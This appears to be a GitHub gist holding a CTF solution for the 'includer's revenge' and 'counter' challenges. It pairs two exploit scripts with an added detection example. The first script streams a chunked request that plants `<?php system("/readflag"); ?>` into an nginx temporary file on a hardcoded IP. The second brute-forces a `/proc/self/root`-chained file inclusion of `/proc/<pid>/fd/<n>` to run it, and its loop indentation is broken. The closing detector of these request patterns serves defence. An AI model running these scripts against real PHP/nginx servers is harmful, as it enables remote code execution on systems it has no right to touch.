@parrot409
Last active December 21, 2021 10:54
includer's revenge and counter solution - script written for counter, but its idea can be used for includer's revenge too - run both scripts at once - /tmp/b has a chunked body with random content - Including nginx temporary file
#!/usr/bin/env python3
from pwn import remote
import time
# fill /tmp/g with `nc -lvnp 9000 > /tmp/g` and then `curl localhost:9000 -F a=@/dev/urandom`
q = open("/tmp/g","rb")
# read up to 10 MiB of the captured request
z = q.read(1024 * 1024 * 10)
while(True):
    p = remote("49.12.232.139",8008)
    # send the captured request in 100-byte slices
    for i in range(1000):
        tosend = z[i*100:i*100+100]
        if(i > 10):
            tosend = tosend
            # after the first 11 slices, keep 29 bytes and append the PHP payload
            tosend = tosend[:29]+b'<?php system("/readflag"); ?>'
        p.send(tosend)
    p.close()
#!/usr/bin/env python3
import requests
while(True):
for k in range(36,38):
for j in range(10,40):
r = requests.get("http://49.12.232.139:8008/?page=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/"+str(k)+"/fd/"+str(j))
if(len(r.text) > 0 ):
print("IT WORKS!")
print(r.text)
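
A detection-side counterpart to the second script, as an added example that is not part of the original gist: it inspects the `page` parameter of request URLs for the two markers visible above, chained `/proc/<pid>/root` hops and a `/proc/<pid>/fd/<n>` include target. The function names and the sample request lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# One leading /proc/<pid>/root hop; the lookahead avoids matching e.g. /proc/self/rootfs.
ROOT_HOP = re.compile(r"/proc/(?:self|\d+)/root(?=/|$)")
FD_REF = re.compile(r"/proc/(?:self|\d+)/fd/\d+$")

def effective_path(path):
    """Strip leading /proc/<pid>/root hops and return (remaining_path, hop_count).

    /proc/<pid>/root is a symlink to that process's root directory, so each hop
    leads back to "/". Simplification: a chroot or another mount namespace for
    <pid> is not modelled here.
    """
    hops = 0
    while (m := ROOT_HOP.match(path)):
        path = path[m.end():] or "/"
        hops += 1
    return path, hops

def inspect_request(url, param="page"):
    """Return a list of (finding, detail) tuples for the include parameter."""
    findings = []
    # parse_qs percent-decodes the value once, so encoded slashes are covered.
    for value in parse_qs(urlsplit(url).query).get(param, []):
        path, hops = effective_path(value)
        if hops:
            findings.append(("root-symlink-hops", hops))
        if FD_REF.match(path):
            findings.append(("proc-fd-include", path))
        elif path.startswith("/proc/"):
            findings.append(("proc-include", path))
    return findings

def flag_requests(urls):
    """Map each suspicious request URL to its findings."""
    return {u: f for u in urls if (f := inspect_request(u))}

# Constructed sample request targets, as they would appear in an access log.
SAMPLE_REQUESTS = [
    "/?page=/proc/self/root/proc/self/root/proc/36/fd/12",
    "/?page=about.php",
    "/?page=%2Fproc%2Fself%2Froot%2Fproc%2F37%2Ffd%2F10",
]

if __name__ == "__main__":
    for url, found in flag_requests(SAMPLE_REQUESTS).items():
        print(url, found)
```

Any hop count above zero is worth alerting on by itself, since an ordinary page name never routes through `/proc/<pid>/root`.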